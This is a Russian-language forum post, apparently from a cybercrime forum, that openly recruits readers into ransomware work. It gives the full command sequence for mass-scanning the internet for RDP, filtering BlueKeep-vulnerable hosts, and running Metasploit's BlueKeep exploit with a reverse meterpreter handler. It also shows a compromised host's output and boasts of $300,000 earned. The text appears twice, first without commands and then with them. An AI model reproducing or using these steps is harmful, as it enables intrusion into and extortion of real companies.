D2
Администратор
- Регистрация
- 19 Фев 2025
- Сообщения
- 4,380
- Реакции
- 0
Как заработать от 1к до 100к баксов за месяц почти без вложений?
Привет коммуннити! Сегодня я расскажу вам как стать рансомварщиками, практически без вложений.
Мы будем добывать точки входа в мелкие и средние компании, при помощи metasploit при этом вложив 100 баксов в покупку лишь 2 х vps
Что нужно:
2 vps сервера на Ubuntu (желательно абузоустойчивые топовая конфигурация будет не нужна поэтому 100 баксов вам должно хватить)
PS вы можете взять любую другую OS я буду описывать настройку именно на убунту
Intro первоначальная настройка впс для работы с метой
У нас есть чистая ubuntu
нактим xrdp + xfce оболочку (мне так удобней вы можете взамидействоать с сервером п ssh)
Обновим пакеты
Накатим xrdp для работы через терминальные сессии
Установим облочку xfce можно поставить mate например (но стабильней всего с терминальным серверовм работает именно xfce)
Разрешим xrdp исользовать эту оболчку
Включаем xrpd
Сорян ошибки граматики пунктуации и синтаксиса писал на колонке ничего не редактируя, если кто то захочет дополнить или записать видео по этой теме закину 50-100 баксов для мотивации)
Done теперь вы можете работать с сервером через терминальную сессию
поставим удобный текстовый редактор gedit
Поставим htop для мониторинга загруженности системы
Установка metasploit, БД к нему подтягивать не будем она не понадобиться
качаем метасплойт курлом или wget
даем права chmod 755 msfinstall
Теперь при наборе msfconsole в шелле метасплойт запуститься.
II выбор RCE и подготовка материала
Добывать свой хлеб мы будем данной уязвимостью
xttps://en.wikipedia.org/wiki/BlueKeep
в метасплойте есть rce для него
Данное rce для протокола rdp оно крайне не стабильно, но приносит хорошие доступы)
С RCE мы определились
теперь нам нужен материал, то есть уязвимые машины в клирнете под блюкип
В идеале если у вас будут подсети с maxmaind и софт для пентеста от z668, он нужен исключительно для чека на RDP сервис дабы не тратить время и пропускать порты все что не относиться к рдп
лучше всего сканировать рандомные TCP порты и потом проверять их на сервис рдп
Я покажу на примере стандандартного 3389 порта
Установим еще 2 софта для сканирования портов (masscan) и rdpscan для проверку на узвимый bluekeep
ставим все не обходимое для работы масскана
затягиваем сорсы к себе
переходим в каталог с массканом cd masscan
собираем в многопотоке
Качаем бесплатно либо покупаем депы IP адресов
данные параметры возьмут депы из фаила res4.txt просканируют порт 3389 с рейтом 100 000 исключая 255.255.255.255 подсеть
выдаст чистые результаты IP с output фаила масскана
Ставим сканер на уязвимость блюкип и все необходимо для его работы
компилируем
Запуск сканера
--workers 500 (количество воркеров стоит отписальное количество зависит от вашей конфигурации сервера )
--port 3389 порт который сканируем
--file /root/rdpscan/ch2.txt путь до фаила с ипами
grep 'VULN' выбираем только уязвимые и записываем в фаил >results.txt
III получаем доступы
Я буду использовать стандартный пейлоад метасплойта для закрепления, можно ипользовать кобальт страйк или любую другую систему пост эксплуатации но статья расчитана на тех у кого нет нихуя даже кряка, будем использовать метерперетер
и так запускаем метасплойт
И сразу открываем второе окно терминала и там опять запускаем метасплойт
В первом окне делаем handler (туда будут лететь сессии отдельным окном)
EXITFUNC есть 3 разных значения: thread, process, seh
мы используем thread он используеться почти везде и работает достаточно хорошо
запускает шелл-код в подпотоке, и выход из этого потока приводит к рабочему приложению / системе.
хэндлер готов и ожидает коннектов
переходим во второе окно
Bluekeep
set LHOST ип впс
через какое то время в хендлер полетят сесии
Вам остается только закрепляться и отбирать доступы)
Enjoy
c Апреля по по Июль я заработал блюкипом около 300.000 USD чистыми деньгами, таким способом можно поймать
компании с ревеню до 100 миллонов,
тем самым поучиться пентесту не покупая мат, в этой теме вы можете задавать вопросы
Привет коммуннити! Сегодня я расскажу вам как стать рансомварщиками, практически без вложений.
Мы будем добывать точки входа в мелкие и средние компании, при помощи metasploit при этом вложив 100 баксов в покупку лишь 2 х vps
Что нужно:
2 vps сервера на Ubuntu (желательно абузоустойчивые топовая конфигурация будет не нужна поэтому 100 баксов вам должно хватить)
PS вы можете взять любую другую OS я буду описывать настройку именно на убунту
Intro первоначальная настройка впс для работы с метой
У нас есть чистая ubuntu
нактим xrdp + xfce оболочку (мне так удобней вы можете взамидействоать с сервером п ssh)
Обновим пакеты
sudo apt-get update
Накатим xrdp для работы через терминальные сессии
sudo apt-get install xrdp
Установим облочку xfce можно поставить mate например (но стабильней всего с терминальным серверовм работает именно xfce)
sudo apt-get install xfce4 xfce4-terminal
Разрешим xrdp исользовать эту оболчку
sudo sed -i.bak '/fi/a #xrdp multiple users configuration n xfce-session n' /etc/xrdp/startwm.sh
Включаем xrpd
Сорян ошибки граматики пунктуации и синтаксиса писал на колонке ничего не редактируя, если кто то захочет дополнить или записать видео по этой теме закину 50-100 баксов для мотивации)
sudo systemctl enable xrdp
Done теперь вы можете работать с сервером через терминальную сессию
поставим удобный текстовый редактор gedit
sudo apt-get install gedit
Поставим htop для мониторинга загруженности системы
sudo apt-get install htop
Установка metasploit, БД к нему подтягивать не будем она не понадобиться
качаем метасплойт курлом или wget
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
даем права chmod 755 msfinstall
sudo ./msfinstall
Теперь при наборе msfconsole в шелле метасплойт запуститься.
II выбор RCE и подготовка материала
Добывать свой хлеб мы будем данной уязвимостью
xttps://en.wikipedia.org/wiki/BlueKeep
в метасплойте есть rce для него
exploit/windows/rdp/cve_2019_0708_bluekeep_rce
Данное rce для протокола rdp оно крайне не стабильно, но приносит хорошие доступы)
С RCE мы определились
теперь нам нужен материал, то есть уязвимые машины в клирнете под блюкип
В идеале если у вас будут подсети с maxmaind и софт для пентеста от z668, он нужен исключительно для чека на RDP сервис дабы не тратить время и пропускать порты все что не относиться к рдп
лучше всего сканировать рандомные TCP порты и потом проверять их на сервис рдп
Я покажу на примере стандандартного 3389 порта
Установим еще 2 софта для сканирования портов (masscan) и rdpscan для проверку на узвимый bluekeep
ставим все не обходимое для работы масскана
sudo apt-get install git gcc make libpcap-dev
затягиваем сорсы к себе
git clone https://github.com/robertdavidgraham/masscan
переходим в каталог с массканом cd masscan
собираем в многопотоке
make -j
Качаем бесплатно либо покупаем депы IP адресов
masscan -iL ip.txt -oL res4.txt -p 3389 --rate 100000 --exclude 255.255.255.255
данные параметры возьмут депы из фаила res4.txt просканируют порт 3389 с рейтом 100 000 исключая 255.255.255.255 подсеть
awk '{ print $4,$3 }' OFS=":" res4.txt > 4433.txt
выдаст чистые результаты IP с output фаила масскана
Ставим сканер на уязвимость блюкип и все необходимо для его работы
sudo apt-get install libssl-dev sudo apt-get install build-essential
git clone https://github.com/robertdavidgraham/rdpscan.git
cd /rdpscan/
компилируем
make -j
Запуск сканера
./rdpscan --workers 500 --port 3389 --file /root/rdpscan/ch2.txt grep 'VULN' | cut -f1 -d'-' >results.txt
--workers 500 (количество воркеров стоит отписальное количество зависит от вашей конфигурации сервера )
--port 3389 порт который сканируем
--file /root/rdpscan/ch2.txt путь до фаила с ипами
grep 'VULN' выбираем только уязвимые и записываем в фаил >results.txt
III получаем доступы
Я буду использовать стандартный пейлоад метасплойта для закрепления, можно ипользовать кобальт страйк или любую другую систему пост эксплуатации но статья расчитана на тех у кого нет нихуя даже кряка, будем использовать метерперетер
и так запускаем метасплойт
msfconsole
И сразу открываем второе окно терминала и там опять запускаем метасплойт
В первом окне делаем handler (туда будут лететь сессии отдельным окном)
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp_rc4
(выбираем пелоад реверс (когда цель подключаеться к нам) с шифрованием )set EXITFUNC thread
EXITFUNC есть 3 разных значения: thread, process, seh
мы используем thread он используеться почти везде и работает достаточно хорошо
запускает шелл-код в подпотоке, и выход из этого потока приводит к рабочему приложению / системе.
set LHOST
хост нашей впсset LPORT
порт где будет висит слушательset RC4PASSWORD PASSS
( пароль для RC4)set ExitOnSession 0
(данный параметр будет держать сессию всегда онлайн (тоесть не будет слипа может привести к быстрому спаливанию))setg SessionLogging y
включить логированиеsetg loglevel 1
уровень логированияrun -j
запускхэндлер готов и ожидает коннектов
переходим во второе окно
Bluekeep
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set payload windows/x64/meterpreter/reverse_tcp_rc4
set EXITFUNC thread
set DisablePayloadHandler 1
(обязтаельно 1 что бы сесия летела в отдельное окно)set LHOST ип впс
set LPORT
порт (указывать такой же как и в хэндлере)set RC4PASSWORD PASSS
(пароль такой же как в хэндлере)set ConnectTimeout 5
(таймаут)set GROOMSIZE 100
(количество мегабайт которыми будет заспамливаться хост играйтесь с парметрами от 100 до 250 ) всегда будут прилетать разные машиныset GROOMCHANNELCOUNT 1
set forceexploit 1
исполнять принудетельноset target 1
(дефолтный таргет тут менять ничего не нужно )set rhosts file:/root/rdpscan/4.txt
(путь до фаила с уязмимыми машинами)set RPORT
(если вы используете не старндартый порт для RDP если 3389 то его можно не указывать он стоит по дефолту)run
- запускчерез какое то время в хендлер полетят сесии
Computer : V-RDS-01 OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1). Architecture : x64 System Language : en_GB Domain : BROWNHILLS Logged On Users : 41 Meterpreter : x64/windows
Вам остается только закрепляться и отбирать доступы)
Enjoy
c Апреля по по Июль я заработал блюкипом около 300.000 USD чистыми деньгами, таким способом можно поймать
компании с ревеню до 100 миллонов,
тем самым поучиться пентесту не покупая мат, в этой теме вы можете задавать вопросы